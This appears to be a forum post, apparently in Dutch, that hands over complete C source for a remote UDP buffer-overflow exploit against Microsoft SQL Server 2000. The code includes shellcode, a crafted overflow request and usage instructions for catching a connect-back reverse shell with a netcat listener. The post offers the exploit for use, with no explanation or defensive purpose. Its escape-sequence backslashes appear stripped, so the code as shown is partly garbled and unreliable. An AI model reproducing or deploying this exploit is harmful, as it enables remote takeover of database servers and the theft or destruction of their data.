ff de exploit geven dan maar:
/*
MSSQL2000 Remote UDP Exploit!
Modified from "Advanced Windows Shellcode" by David Litchfield, [email]david@ngssoftware.com[/email]
fix a bug.
Modified by lion, [email]lion@cnhonker.net[/email]
Welcome to HUC Website
http://www.cnhonker.com*/
#include <stdio.h>
#include <winsock2.h>
#pragma comment (lib,"Ws2_32")
int GainControlOfSQL(void);
int StartWinsock(void);
struct sockaddr_in c_sa;
struct sockaddr_in s_sa;
struct hostent *he;
SOCKET sock;
unsigned long addr;
int SQLUDPPort=1434;
char host[256]="";
char request[4000]="x04";
char ping[8]="x02";
char exploit_code[]=
"x55x8BxECx68x18x10xAEx42x68x1C"
"x10xAEx42xEBx03x5BxEBx05xE8xF8"
"xFFxFFxFFxBExFFxFFxFFxFFx81xF6"
"xAExFExFFxFFx03xDEx90x90x90x90"
"x90x33xC9xB1x44xB2x58x30x13x83"
"xEBx01xE2xF9x43x53x8Bx75xFCxFF"
"x16x50x33xC0xB0x0Cx03xD8x53xFF"
"x16x50x33xC0xB0x10x03xD8x53x8B"
"x45xF4x50x8Bx75xF8xFFx16x50x33"
"xC0xB0x0Cx03xD8x53x8Bx45xF4x50"
"xFFx16x50x33xC0xB0x08x03xD8x53"
"x8Bx45xF0x50xFFx16x50x33xC0xB0"
"x10x03xD8x53x33xC0x33xC9x66xB9"
"x04x01x50xE2xFDx89x45xDCx89x45"
"xD8xBFx7Fx01x01x01x89x7DxD4x40"
"x40x89x45xD0x66xB8xFFxFFx66x35"
"xFFxCAx66x89x45xD2x6Ax01x6Ax02"
"x8Bx75xECxFFxD6x89x45xECx6Ax10"
"x8Dx75xD0x56x8Bx5DxECx53x8Bx45"
"xE8xFFxD0x83xC0x44x89x85x58xFF"
"xFFxFFx83xC0x5Ex83xC0x5Ex89x45"
"x84x89x5Dx90x89x5Dx94x89x5Dx98"
"x8DxBDx48xFFxFFxFFx57x8DxBDx58"
"xFFxFFxFFx57x33xC0x50x50x50x83"
"xC0x01x50x83xE8x01x50x50x8Bx5D"
"xE0x53x50x8Bx45xE4xFFxD0x33xC0"
"x50xC6x04x24x61xC6x44x24x01x64"
"x68x54x68x72x65x68x45x78x69x74"
"x54x8Bx45xF0x50x8Bx45xF8xFFx10"
"xFFxD0x90x2Fx2Bx6Ax07x6Bx6Ax76"
"x3Cx34x34x58x58x33x3Dx2Ax36x3D"
"x34x6Bx6Ax76x3Cx34x34x58x58x58"
"x58x0Fx0Bx19x0Bx37x3Bx33x3Dx2C"
"x19x58x58x3Bx37x36x36x3Dx3Bx2C"
"x58x1Bx2Ax3Dx39x2Cx3Dx08x2Ax37"
"x3Bx3Dx2Bx2Bx19x58x58x3Bx35x3C"
"x58";
int main(int argc, char *argv[])
{
unsigned int ErrorLevel=0,len=0,c =0;
int count = 0;
char sc[300]="";
char ipaddress[40]="";
unsigned short port = 0;
unsigned int ip = 0;
char *ipt="";
char buffer[400]="";
unsigned short prt=0;
char *prtt="";
if(argc != 2 && argc != 5)
{
printf("===============================================================rn");
printf("SQL Server UDP Buffer Overflow Remote Exploitrnn");
printf("Modified from "Advanced Windows Shellcode"rn");
printf("Code by David Litchfield, [email]david@ngssoftware.com[/email]rn");
printf("Modified by lion, fix a bug.rn");
printf("Welcome to HUC Website
http://www.cnhonker.comrnn");
printf("Usage:rn");
printf(" %s Target [<NCHost> <NCPort> <SQLSP>]rnn", argv[0]);
printf("Exemple:rn");
printf("Target is MSSQL SP 0:rn");
printf(" C:\>nc -l -p 53rn");
printf(" C:\>%s db.target.com 202.202.202.202 53 0rn",argv[0]);
printf("Target is MSSQL SP 1 or 2:rn");
printf(" c:\>%s db.target.com 202.202.202.202rnn", argv[0]);
return 0;
}
strncpy(host, argv[1], 100);
if(argc == 5)
{
strncpy(ipaddress, argv[2], 36);
port = atoi(argv[3]);
// SQL Server 2000 Service pack level
// The import entry for GetProcAddress in sqlsort.dll
// is at 0x42ae1010 but on SP 1 and 2 is at 0x42ae101C
// Need to set the last byte accordingly
if(argv[4][0] == 0x30)
{
printf("MSSQL SP 0. GetProcAddress @0x42ae1010rn");
exploit_code[9]=0x10;
}
else
{
printf("MSSQL SP 1 or 2. GetProcAddress @0x42ae101Crn");
}
}
ErrorLevel = StartWinsock();
if(ErrorLevel==0)
{
printf("Starting Winsock Error.rn");
return 0;
}
if(argc == 2)
{
strcpy(request,ping);
GainControlOfSQL();
return 0;
}
strcpy(buffer,exploit_code);
// set this IP address to connect back to
// this should be your address
ip = inet_addr(ipaddress);
ipt = (char*)&ip;
buffer[142]=ipt[0];
buffer[143]=ipt[1];
buffer[144]=ipt[2];
buffer[145]=ipt[3];
// set the TCP port to connect on
// netcat should be listening on this port
// e.g. nc -l -p 80
prt = htons(port);
prt = prt ^ 0xFFFF;
prtt = (char *) &prt;
buffer[160]=prtt[0];
buffer[161]=prtt[1];
strcat(request,"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXX");
// Overwrite the saved return address on the stack
// This address contains a jmp esp instruction
// and is in sqlsort.dll.
strcat(request,"xDCxC9xB0x42"); // 0x42B0C9DC
// Need to do a near jump
strcat(request,"xEBx0Ex41x42x43x44x45x46");
// Need to set an address which is writable or
// sql server will crash before we can exploit
// the overrun. Rather than choosing an address
// on the stack which could be anywhere we'll
// use an address in the .data segment of sqlsort.dll
// as we're already using sqlsort for the saved
// return address
// SQL 2000 no service packs needs the address here
strcat(request,"x01x70xAEx42");
// SQL 2000 Service Pack 2 needs the address here
strcat(request,"x01x70xAEx42");
// just a few nops
strcat(request,"x90x90x90x90x90x90x90x90");
// tack on exploit code to the end of our request and fire it off
strcat(request,buffer);
GainControlOfSQL();
return 0;
}
int StartWinsock()
{
int err=0;
WORD wVersionRequested;
WSADATA wsaData;
wVersionRequested = MAKEWORD(2,1);
err = WSAStartup( wVersionRequested, &wsaData );
if (err != 0)
{
printf("error WSAStartup 1.rn");
return 0;
}
if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 1 )
{
printf("error WSAStartup 2.rn");
WSACleanup( );
return 0;
}
if (isalpha(host[0]))
{
he = gethostbyname(host);
if (he == NULL)
{
printf("Can't get the ip of %s!rn", host);
WSACleanup( );
exit(-1);
}
s_sa.sin_addr.s_addr=INADDR_ANY;
s_sa.sin_family=AF_INET;
memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);
}
else
{
s_sa.sin_family=AF_INET;
s_sa.sin_addr.s_addr = inet_addr(host);
}
return 1;
}
int GainControlOfSQL(void)
{
char resp[600]="";
int snd=0,rcv=0,count=0, var=0;
unsigned int ttlbytes=0;
unsigned int to=2000;
struct sockaddr_in cli_addr;
SOCKET cli_sock;
cli_sock=socket(AF_INET,SOCK_DGRAM,0);
if (cli_sock==INVALID_SOCKET)
{
return printf("sock erronrn");
}
cli_addr.sin_family=AF_INET;
cli_addr.sin_addr.s_addr=INADDR_ANY;
cli_addr.sin_port=htons((unsigned short)53);
setsockopt(cli_sock,SOL_SOCKET,SO_RCVTIMEO,(char *)&to,sizeof(unsigned int));
if(bind(cli_sock,(LPSOCKADDR)&cli_addr,sizeof(cli_addr))==SOCKET_ERROR)
{
return printf("bind error");
}
s_sa.sin_port=htons((unsigned short)SQLUDPPort);
if (connect(cli_sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR)
{
return printf("Connect error");
}
else
{
snd=send(cli_sock, request , strlen (request) , 0);
printf("Packet sent!rn");
printf("If you don't have a shell it didn't work.rn");
rcv = recv(cli_sock,resp,596,0);
if(rcv > 1)
{
while(count < rcv)
{
if(resp[count]==0x00)
resp[count]=0x20;
count++;
}
printf("%s",resp);
}
}
closesocket(cli_sock);
return 0;
}